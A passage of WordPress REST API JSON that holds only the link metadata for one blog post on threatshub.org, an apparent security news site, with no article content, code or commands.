Author"}}]}},"_links":{"self":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/56974","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/comments?post=56974"}],"version-history":[{"count":0,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/56974\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media\/56975"}],"wp:attachment":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media?parent=56974"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/categories?post=56974"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/tags?post=56974"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}